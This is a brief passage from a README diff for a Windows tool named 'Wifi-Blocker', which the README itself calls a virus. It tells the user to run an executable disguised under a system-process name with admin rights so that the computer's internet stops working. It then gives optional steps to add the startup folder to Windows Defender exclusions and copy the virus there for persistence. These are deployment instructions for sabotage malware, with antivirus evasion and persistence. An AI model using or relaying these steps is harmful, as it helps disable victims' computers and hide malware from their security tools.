AnonymousXempt/Wifi-Blocker/README.md

 2. Run as administrator "Service Host; Touch Keyboard and Mouse.exe" (it needs Admin priviledges to work)

 3. Computers Internet Will Then Be Useless

+4. ***Optional*** Run colors.bat as amdin to add startup folder to Windows Defender Exclusions, Run copy.bat to copy the Virus into the Users Startup Folder.

 # **How It Works**